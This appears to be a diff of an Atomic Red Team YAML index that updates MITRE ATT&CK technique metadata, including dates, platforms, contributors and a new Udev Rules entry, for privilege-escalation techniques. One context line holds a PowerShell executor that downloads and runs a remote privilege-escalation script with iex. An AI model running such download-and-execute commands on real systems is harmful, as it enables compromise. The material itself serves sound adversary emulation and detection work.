       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests:
     - name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -48641,7 +48922,7 @@ privilege-escalation:
         elevation_required: true
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -48674,9 +48955,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -48693,9 +48975,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -48741,7 +49022,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests:
     - name: EXO - Full access mailbox permission granted to a user
@@ -48797,33 +49077,15 @@ privilege-escalation:
         elevation_required: false
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -48831,6 +49093,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -48838,7 +49102,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -48868,7 +49132,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -48914,7 +49177,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -48959,8 +49222,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -48986,7 +49247,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -49012,8 +49273,6 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests:
     - name: Logon Scripts
@@ -49043,53 +49302,24 @@ privilege-escalation:
         name: command_prompt
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -49106,6 +49336,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -49120,16 +49353,47 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests:
     - name: Process injection ListPlanting
@@ -49169,7 +49433,7 @@ privilege-escalation:
         elevation_required: true
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -49214,9 +49478,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -49273,8 +49536,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -49283,7 +49546,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -49325,7 +49587,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -49350,7 +49612,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests:
     - name: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
@@ -49394,7 +49655,7 @@ privilege-escalation:
         elevation_required: true
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -49434,8 +49695,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -49443,13 +49706,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -49480,9 +49743,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -49683,10 +49943,10 @@ privilege-escalation:
           '
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -49749,7 +50009,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -49783,8 +50043,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -49793,6 +50053,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -49805,7 +50069,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests:
     - name: At.exe Scheduled task
@@ -49968,7 +50231,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests:
     - name: Process Injection via mavinject.exe
@@ -50017,6 +50279,65 @@ privilege-escalation:
       executor:
         command: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/UsoDLL/Get-UsoClientDLLSystem.ps1')
         name: powershell
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -50052,7 +50373,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -50076,7 +50397,6 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests:
     - name: Netsh Helper DLL Registration
@@ -50116,7 +50436,7 @@ privilege-escalation:
         elevation_required: true
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -50200,11 +50520,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -50256,9 +50575,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests:
     - name: Create local account with admin privileges
@@ -50557,7 +50875,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -50595,8 +50913,6 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests:
     - name: User scope COR_PROFILER
@@ -50732,23 +51048,24 @@ privilege-escalation:
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
